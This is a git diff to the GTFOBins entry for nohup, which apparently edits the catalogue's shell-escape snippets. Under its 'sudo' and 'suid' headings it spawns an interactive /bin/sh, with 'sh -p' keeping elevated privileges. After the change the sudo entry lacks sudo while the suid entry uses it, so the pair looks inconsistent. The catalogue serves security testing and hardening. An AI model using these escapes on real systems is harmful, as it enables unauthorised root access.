diff --git a/_gtfobins/nohup.md b/_gtfobins/nohup.md index 6c75a80..2024e07 100644 --- a/_gtfobins/nohup.md +++ b/_gtfobins/nohup.md @@ -8,7 +8,7 @@ functions: nohup "$COMMAND" cat nohup.out sudo: - - code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)" + - code: nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)" suid: - code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)" ---